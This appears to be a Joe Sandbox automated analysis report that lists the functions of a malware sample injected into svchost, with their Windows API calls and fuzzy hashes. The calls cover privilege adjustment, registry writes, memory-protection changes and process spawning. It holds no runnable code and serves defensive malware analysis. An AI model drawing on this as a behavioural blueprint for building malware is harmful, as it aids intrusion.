Part of subcall function 027E3555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 027E3585
Part of subcall function 027E3555: GetLastError.KERNEL32 ref: 027E358B
Part of subcall function 027E3555: GetProcessHeap.KERNEL32(00000008,00000001), ref: 027E35A1
Part of subcall function 027E3555: RtlAllocateHeap.NTDLL(00000000), ref: 027E35A8
Part of subcall function 027E3555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 027E35C1
Part of subcall function 027E3555: GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 027E35CF
Part of subcall function 027E3555: FindCloseChangeNotification.KERNELBASE(00000000), ref: 027E35F0
Part of subcall function 027E3555: GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E35FD
Part of subcall function 027E3555: HeapFree.KERNEL32(00000000), ref: 027E3604

ExitProcess.KERNEL32 ref: 027E26E6

Part of subcall function 027E25E3: lstrcpyW.KERNEL32(?,027E7328), ref: 027E25F6
Part of subcall function 027E25E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 027E2612
Part of subcall function 027E25E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 027E2623
Part of subcall function 027E25E3: GetLastError.KERNEL32 ref: 027E262D

Part of subcall function 027E2C33: StrStrIW.KERNELBASE(027E63B4,?), ref: 027E2C67

Part of subcall function 027E1BB9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E1BFF
Part of subcall function 027E1BB9: HeapFree.KERNEL32(00000000), ref: 027E1C06

Part of subcall function 027E1FE9: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 027E1FF0
Part of subcall function 027E1FE9: CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 027E2009
Part of subcall function 027E1FE9: FindCloseChangeNotification.KERNELBASE(00000000), ref: 027E2014

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Create$ErrorEventToken$ChangeCloseFindFreeInformationLastNotificationlstrcpy$AllocateAuthorityExceptionExitFilterModeOpenThreadUnhandledVersionlstrcatmemset
String ID:
API String ID: 179549865-0
Opcode ID: b90fa7a9ccd83a3ce3a81710e9aa157214af358f768ad7a6c7ae38d4d092298e
Instruction ID: d4867335ec2d68f2bb9c118ff39c794559c1f9ab4dc2b5ca7b518e289fd916da
Opcode Fuzzy Hash: b90fa7a9ccd83a3ce3a81710e9aa157214af358f768ad7a6c7ae38d4d092298e
Instruction Fuzzy Hash: B5F039A0680302AAEF0637F5AC0EB2D251E5F5D316F0489A0AD47CA496DF20D8200D37

Uniqueness

Uniqueness Score: -1.00%

Function 027E29F5 Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4937b5d591bafc2507705a681030387efb80a203dc4c760eb4fcb77ed200a0d4
Instruction ID: 10964ad3a8ae44c4e575d660942db7faf8122a11033347331fdfd27e1c470ea8
Opcode Fuzzy Hash: 4937b5d591bafc2507705a681030387efb80a203dc4c760eb4fcb77ed200a0d4
Instruction Fuzzy Hash: EC516A72648342DFEB18CF28D850AA677E8EF9C214F15886DF857CB252E770E904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 027E54AC Relevance: 3.1, APIs: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 027E54C0
CreateDirectoryW.KERNELBASE(00000000,027E62B8), ref: 027E5500

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: d67b30fd15b4dd124beb8c563d7dd8218da429b3c5a2cbe6c1173dba197b4e3c
Instruction ID: 7024fc276280801f8c16ce3a50233ff89b46c1c79ebb25620f25b143f93fb19e
Opcode Fuzzy Hash: d67b30fd15b4dd124beb8c563d7dd8218da429b3c5a2cbe6c1173dba197b4e3c
Instruction Fuzzy Hash: 6611C8A6A0021C7EFB01A6A59C45DFFBFBCDF89A60F10405BF905D7140E6389A069B71

Uniqueness

Uniqueness Score: -1.00%

Function 027E55BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 027E55D3
CreateDirectoryW.KERNELBASE(?,027E62B8), ref: 027E561C

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: dd03eae48b518e51eabe3a0331718a9c30cb03bdd4b4d840a477345b752da6b9
Instruction ID: ae14458e385604c77813acc53b7874c65e16833a456c06d9394fbc2aeafe8a3c
Opcode Fuzzy Hash: dd03eae48b518e51eabe3a0331718a9c30cb03bdd4b4d840a477345b752da6b9
Instruction Fuzzy Hash: DA01DDB2A4021C7EFF0566A9EC89D7FBF7CEB8DA14B50001BF906D6140DD7469018671

Uniqueness

Uniqueness Score: -1.00%

Function 027E1BB9 Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E1BFF
HeapFree.KERNEL32(00000000), ref: 027E1C06

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 6f3d76ec0758bffd2ee31a894638512c46a26031f3b8f1cab1da13ef7fb9374f
Instruction ID: 694286fde07c4cd1758c12651be74d02599b3d146e38b95872529f3f8f73e8ab
Opcode Fuzzy Hash: 6f3d76ec0758bffd2ee31a894638512c46a26031f3b8f1cab1da13ef7fb9374f
Instruction Fuzzy Hash: A2F03076D40108FBDF01EAE4DD06B9DB77CAB08309F400591FA15E6190E6719B24ABB5

Uniqueness

Uniqueness Score: -1.00%

Function 027E3641 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,027E2790), ref: 027E3659

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 6089d8f3d10e60ebd7c8e3324de59500b96fa77a13f58a581930beaf9ec72e5a
Instruction ID: f48aab26c67c9d382f3b233618908c3d799559c0469855e9a57cb1448ec86001
Opcode Fuzzy Hash: 6089d8f3d10e60ebd7c8e3324de59500b96fa77a13f58a581930beaf9ec72e5a
Instruction Fuzzy Hash: 33D0C233A1421C56CB00A6B9A9099CBF7FCDB8C610F0049A6E501EB140E871999443E0

Uniqueness

Uniqueness Score: -1.00%

Function 027E29AE Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 027E2BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 027E2BDA
Part of subcall function 027E2BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 027E2C23

Sleep.KERNELBASE(000000FF), ref: 027E29E9

Part of subcall function 027E2674: SetErrorMode.KERNELBASE(00008007), ref: 027E2679

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual$ErrorModeSleep
String ID:
API String ID: 46048798-0
Opcode ID: 7efdea17af8c8e27379ac0b4a821313ca9a57fbaa206818f774425ea6aa73da1
Instruction ID: 91914a631b5f3fa0336ba982c509420ada22c69e400f1562bc3430521cf8e902
Opcode Fuzzy Hash: 7efdea17af8c8e27379ac0b4a821313ca9a57fbaa206818f774425ea6aa73da1
Instruction Fuzzy Hash: B8E012319141119FDE51A764980CB9532EC6F2D310F051661AD22EF196D7308850CB70

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 027E3E7E Relevance: 12.1, APIs: 8, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,027E73C8,00000001,F0000000,00000094,?), ref: 027E3EA1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000001), ref: 027E3EBE
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 027E3ED4
CryptImportKey.ADVAPI32(?,00000000,00000094,00000000,00000000,?), ref: 027E3EF1
CryptVerifySignatureA.ADVAPI32(?,00000000,00000080,00000000,00000000,00000000), ref: 027E3F0D
CryptDestroyKey.ADVAPI32(?), ref: 027E3F18
CryptDestroyHash.ADVAPI32(?), ref: 027E3F26
CryptReleaseContext.ADVAPI32(?,00000000), ref: 027E3F30

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportReleaseSignatureVerify
String ID:
API String ID: 972346567-0
Opcode ID: 3a215f031f310249c5bbcbfedd894af100c4ab62b470ee3f2851af096d0719a9
Instruction ID: d7a4da8d50b568ceacbd3f5d3b88fcb7b6849924385964bdf95d56fe7c6957d3
Opcode Fuzzy Hash: 3a215f031f310249c5bbcbfedd894af100c4ab62b470ee3f2851af096d0719a9
Instruction Fuzzy Hash: BD21FC36D40258FBCF219F95ED09E9FFF79EB89B11F008595F901A6160D7318A21EB60

Uniqueness

Uniqueness Score: -1.00%

Function 027E2F1A Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(027E7658,00000000,00000000,00000001,F0000000,027E62B0,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2F35
CryptCreateHash.ADVAPI32(027E7658,00008003,00000000,00000000,?,00000000,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2F52
CryptHashData.ADVAPI32(?,027E7658,?,00000000,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2F68
CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2F83
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,027E5B88,?,00000000,?), ref: 027E2FA3
CryptDestroyHash.ADVAPI32(?,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2FB3
CryptReleaseContext.ADVAPI32(027E7658,00000000,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2FC2

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDestroyParamRelease
String ID:
API String ID: 276068997-0
Opcode ID: 1138fb090a3a7f97158ca23164ee6fdc2cdf4fc1f643ce197ae3f23dc15475e6
Instruction ID: 55e45a60e769635ae6160e0eadbf84506040ec11130932db7159d22d884e145e
Opcode Fuzzy Hash: 1138fb090a3a7f97158ca23164ee6fdc2cdf4fc1f643ce197ae3f23dc15475e6
Instruction Fuzzy Hash: 3C211AB294021DFFDF218F90DD85AAEBB7DEB08755F0085A5FE02A6150D7318E209BA0

Uniqueness

Uniqueness Score: -1.00%

Function 027E39E8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,027E1210,?,027E71F0,?), ref: 027E39F4
OpenProcessToken.ADVAPI32(00000000,?,027E1210,?,027E71F0,?), ref: 027E39FB
LookupPrivilegeValueA.ADVAPI32(00000000,027E71F0,027E1210), ref: 027E3A11
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 027E3A36
CloseHandle.KERNEL32(?,?,?,?,027E1210,?,027E71F0,?), ref: 027E3A41

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 0d5bb845352f82df48b7cc9da9f3ced59e94dee1ef7879f8a4f7de34ead5b71f
Instruction ID: d9601e39b3bf8fc02451dbac44b602dea56f8ff6e25fe43c2dfa43f272613ac0
Opcode Fuzzy Hash: 0d5bb845352f82df48b7cc9da9f3ced59e94dee1ef7879f8a4f7de34ead5b71f
Instruction Fuzzy Hash: EFF01976D00158FBDF209A95ED0CEAFBABDEB89B11F004599B805E6100D7308A14DAB1

Uniqueness

Uniqueness Score: -1.00%

Function 027E4794 Relevance: 15.1, APIs: 10, Instructions: 143filesleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 027E4830
CreateEventW.KERNEL32(027E62B8,00000000,00000000,?), ref: 027E4852
CreateFileMappingW.KERNEL32(000000FF,027E62B8,00000004,00000000,00000000,?), ref: 027E4886
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 027E489D
SetEvent.KERNEL32(00000000), ref: 027E48D9
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 027E48EC
UnmapViewOfFile.KERNEL32(00000000), ref: 027E48F3
CloseHandle.KERNEL32(?), ref: 027E4903
CloseHandle.KERNEL32(?), ref: 027E4910
CloseHandle.KERNEL32(00000000), ref: 027E4917

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateEventView$MappingObjectSingleSleepUnmapWait
String ID:
API String ID: 3151294157-0
Opcode ID: f910c40f52442a1a525753ed9418bc0569a55b2fe098e29865269bdc103e654c
Instruction ID: b6af4035cf771b0ba82ae2930bd1d528f13f5b9749738c41b5f5ea4577790f1e
Opcode Fuzzy Hash: f910c40f52442a1a525753ed9418bc0569a55b2fe098e29865269bdc103e654c
Instruction Fuzzy Hash: 22410432648385EFDB219F549859BABBBA8FF9D750F00481DF59ACA181DB70C405C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 027E1CD5 Relevance: 12.1, APIs: 8, Instructions: 115memorysleepstringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 027E1CFD
RtlAllocateHeap.NTDLL(00000000), ref: 027E1D04

Part of subcall function 027E1F07: wsprintfA.USER32 ref: 027E1F49

lstrcpy.KERNEL32(00000000,00000000), ref: 027E1D2D
GetProcessHeap.KERNEL32(00000000,?), ref: 027E1DF6
HeapFree.KERNEL32(00000000), ref: 027E1DFD
Sleep.KERNEL32(00001388), ref: 027E1E08
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E1E1A
HeapFree.KERNEL32(00000000), ref: 027E1E21

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpywsprintf
String ID:
API String ID: 4213899483-0
Opcode ID: c4e62190ef2d2312d418e4cb19a4cc215d53e541c16497153321670054b1a40f
Instruction ID: 7e905040f101580035a5bf7f3bae8641ecca5b29e09e3336e6f5c1373125169a
Opcode Fuzzy Hash: c4e62190ef2d2312d418e4cb19a4cc215d53e541c16497153321670054b1a40f
Instruction Fuzzy Hash: 81414671904300DBDB209F69D889A2BBBE8EB8C315F40496EF59A86150D770DA14CB76

Uniqueness

Uniqueness Score: -1.00%

Function 027E1E38 Relevance: 12.1, APIs: 8, Instructions: 81memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,027E1148,00000009,00000000,027E71E0,00000007), ref: 027E1E47
GetProcessHeap.KERNEL32(00000008,-0000000B,?,?,?,?,027E1148,00000009,00000000,027E71E0,00000007), ref: 027E1E67
RtlAllocateHeap.NTDLL(00000000), ref: 027E1E6E
lstrcpy.KERNEL32(0000000C,00000000), ref: 027E1E97
CreateThread.KERNEL32(00000000,00000000,027E1F56,00000000,00000000,00000000), ref: 027E1EDB
CloseHandle.KERNEL32(00000000,?,?,?,?,027E1148,00000009,00000000,027E71E0,00000007), ref: 027E1EE6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,027E1148,00000009,00000000,027E71E0,00000007), ref: 027E1EF3
HeapFree.KERNEL32(00000000,?,?,?,?,027E1148,00000009,00000000,027E71E0,00000007), ref: 027E1EFA

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseCreateFreeHandleThreadlstrcpylstrlen
String ID:
API String ID: 3086719409-0
Opcode ID: 6ccbe10d39fbf814da1a174700bba004f8a4d5c54a96b8615826bf3dc648249c
Instruction ID: 03f123180be51bee564c46773b92ee6450548b6349037ab41de366fbe4b7e5dd
Opcode Fuzzy Hash: 6ccbe10d39fbf814da1a174700bba004f8a4d5c54a96b8615826bf3dc648249c
Instruction Fuzzy Hash: E5219F31900746EFDF259F64D889A67BBA8FF4D259B44C918F95A8A204D770EC14CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 027E598A Relevance: 10.6, APIs: 7, Instructions: 100memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 027E59D3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 027E59E8
RtlAllocateHeap.NTDLL(00000000), ref: 027E59EF
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,-00000001,?), ref: 027E5A09
GetProcessHeap.KERNEL32(00000000,?), ref: 027E5A1E
HeapFree.KERNEL32(00000000), ref: 027E5A25
RegCloseKey.ADVAPI32(00000000), ref: 027E5A2C

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFree
String ID:
API String ID: 1930173803-0
Opcode ID: a3ca277b7e14523fc85794b311962f10d3c45eb0746e79b0f01a80255b941d32
Instruction ID: 80f9ab9dc23d7096d834f42023185ce480d4e06b6f720c3e17c8479602e33a8b
Opcode Fuzzy Hash: a3ca277b7e14523fc85794b311962f10d3c45eb0746e79b0f01a80255b941d32
Instruction Fuzzy Hash: 5931E571240349AFEF219F248C88B7BBBACEF4D629F048818F986DB240E774D8058771

Uniqueness

Uniqueness Score: -1.00%

Function 027E15D5 Relevance: 10.6, APIs: 7, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 027E15E4
GetProcessHeap.KERNEL32(00000008,-00000103), ref: 027E15FA
RtlAllocateHeap.NTDLL(00000000), ref: 027E1601

Part of subcall function 027E56E6: GetTempPathA.KERNEL32(00000104,?), ref: 027E56F7

Part of subcall function 027E2E5A: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 027E2E75

GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E1669
HeapFree.KERNEL32(00000000), ref: 027E1670
GetProcessHeap.KERNEL32(00000000,?), ref: 027E1683
HeapFree.KERNEL32(00000000), ref: 027E168A

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateCreateFilePathTemplstrlen
String ID:
API String ID: 953720001-0
Opcode ID: efcbcccc2cebd1b5578e831022f2541240e01f80171b1f0f183326d3c039b1de
Instruction ID: da0cc8ecaef70d2990c6d5770a7a948c1ffbbbf0f1b3b9c7f67528e5ee19a96d
Opcode Fuzzy Hash: efcbcccc2cebd1b5578e831022f2541240e01f80171b1f0f183326d3c039b1de
Instruction Fuzzy Hash: 6A11B4B2844305FBEF055FA49C4AF7ABB6CEF8D715F088815FA4689040DF7499118B75

Uniqueness

Uniqueness Score: -1.00%

Function 027E4E55 Relevance: 10.6, APIs: 7, Instructions: 62memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,00000000,?,?,027E49A2,00000000,00000000,?,00000000,00000000,027E70E8), ref: 027E4E70
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 027E4E77
CreateThread.KERNEL32(00000000,00000000,027E4F6B,00000000,00000000,00000000), ref: 027E4EAA
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,027E70E8), ref: 027E4EB6
HeapFree.KERNEL32(00000000,?,00000000,00000000,027E70E8), ref: 027E4EBD
CloseHandle.KERNEL32(00000000,00000000,?,?,027E49A2,00000000,00000000,?,00000000,00000000,027E70E8), ref: 027E4ECD
CloseHandle.KERNEL32(00000000,?,00000000,00000000,027E70E8), ref: 027E4EDF

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$AllocateCreateFreeThread
String ID:
API String ID: 1729137577-0
Opcode ID: 1c43a0eaca53b81f09d869e1c4978e192f270a6fb8d30ebadb633dca9178a1e4
Instruction ID: b717bd8b274ebb5306cd1b203cec95e8105ec177f509cca9eae6e96aa5d2fd1d
Opcode Fuzzy Hash: 1c43a0eaca53b81f09d869e1c4978e192f270a6fb8d30ebadb633dca9178a1e4
Instruction Fuzzy Hash: FD11C831E453A1E7DF256E745C1CF27AB5DAF8DA15F098959FA42EE188C770C81087B0

Uniqueness

Uniqueness Score: -1.00%

Function 027E58A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 027E2EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,027E2D76,?,?,?,?), ref: 027E2ED5

memset.MSVCRT ref: 027E58E2
lstrcpyW.KERNEL32(?,027E63B4), ref: 027E590D
lstrcatW.KERNEL32(?,027E764C), ref: 027E591F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 027E593B
ExitProcess.KERNEL32 ref: 027E5946

Strings

D, xrefs: 027E58EA

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExitFilelstrcatlstrcpymemset
String ID: D
API String ID: 898148731-2746444292
Opcode ID: 2c51393ffd2eb67306da5db7baac9606cb27cc9067aab6fa8ed92a0ea5d533d6
Instruction ID: dde646d786377e5490fd89c6059eedd2567dbe17803faba3b343bc2666a285ba
Opcode Fuzzy Hash: 2c51393ffd2eb67306da5db7baac9606cb27cc9067aab6fa8ed92a0ea5d533d6
Instruction Fuzzy Hash: 401130B290020CAFDF119BE4DC49FEA777CEF48715F008461BA0ADA140E634DA648B74

Uniqueness

Uniqueness Score: -1.00%

Function 027E3BE0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 027E3BF9
RtlReAllocateHeap.NTDLL(00000000), ref: 027E3C4D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000104,00000000,00000000), ref: 027E3CB5
HeapFree.KERNEL32(00000000), ref: 027E3CEB
HeapFree.KERNEL32(00000000), ref: 027E3D00

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateByteCharCurrentMultiProcessWide
String ID:
API String ID: 3321845206-0
Opcode ID: 1d3f30490a4bd74b9351db55989a89d4f11162223d99ccb4004fadba303c44e8
Instruction ID: 883c86b7241363b601280ad89deb28d617177008f32745aaf5ea3f0a06c99f12
Opcode Fuzzy Hash: 1d3f30490a4bd74b9351db55989a89d4f11162223d99ccb4004fadba303c44e8
Instruction Fuzzy Hash: C031D43160A315AFEF249A659C48F7BB6ACEF4CB49F014858BA47DB090E770D854CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 027E5A75 Relevance: 9.1, APIs: 6, Instructions: 92memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000001), ref: 027E5ACA
RtlAllocateHeap.NTDLL(00000000), ref: 027E5AD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?,00000001), ref: 027E5B24
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E5B2F
HeapFree.KERNEL32(00000000), ref: 027E5B36
RegCloseKey.ADVAPI32(?), ref: 027E5B3D

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseFreeValue
String ID:
API String ID: 1659168586-0
Opcode ID: 6e2132145a6b1c9b995178267672143fc1024890e208c2ccc7eaa4a7b2567e0e
Instruction ID: 449f03dce511db1267193859ff111136edbabb1614ecd8dbe186581a143d5388
Opcode Fuzzy Hash: 6e2132145a6b1c9b995178267672143fc1024890e208c2ccc7eaa4a7b2567e0e
Instruction Fuzzy Hash: 73214B32A443599BCF315EB49C98B37BB6DDF8D918F408419F6839F241DAB0D80587B0

Uniqueness

Uniqueness Score: -1.00%

Function 027E2482 Relevance: 9.1, APIs: 6, Instructions: 71memorystringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 027E24B4
lstrlen.KERNEL32(00000000), ref: 027E24D7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E2524
HeapFree.KERNEL32(00000000), ref: 027E252B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E254C
HeapFree.KERNEL32(00000000), ref: 027E2553

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$ObjectSingleWaitlstrlen
String ID:
API String ID: 2190776780-0
Opcode ID: ae29e3e2253dc21a2f8a6f19aac4228d656bafb149b3e424227ac917b999561d
Instruction ID: 5863d9583f3595a4b60864d783b20b16e42c768e97e3abc33010899284ab6a1a
Opcode Fuzzy Hash: ae29e3e2253dc21a2f8a6f19aac4228d656bafb149b3e424227ac917b999561d
Instruction Fuzzy Hash: 1E213B72C05209EBEF15DFE0D9087AEBABDAF4C326F204455E902B6091E7744B54CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 027E38A9 Relevance: 9.1, APIs: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

_vsnprintf.MSVCRT ref: 027E38B8
